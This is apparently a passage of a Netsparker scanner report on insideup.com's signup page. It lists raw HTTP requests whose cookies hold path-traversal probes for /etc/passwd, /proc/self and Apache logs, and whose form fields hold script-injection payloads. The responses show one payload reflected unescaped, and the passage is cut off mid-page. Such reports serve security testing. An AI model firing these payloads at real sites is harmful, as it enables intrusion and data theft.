OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 219
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0012F8)%3c%2fscript%3e&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:19 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=214D1B52E896811CC41F4B0ACFA88438; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0012F8)</script>"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x0012F8)</script>"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> 
<form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x0012F8)&lt;/script&gt;'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST '"--></style></script><script>alert(0x001312)</script>
emailAddress POST netsparker@example.com
firstName POST Smith
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 260
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001312)%3c%2fscript%3e&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:30 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=D383696ECF1E26DF8E0F6A2770A4964A; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="http://www.insideup.com/index.html"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input 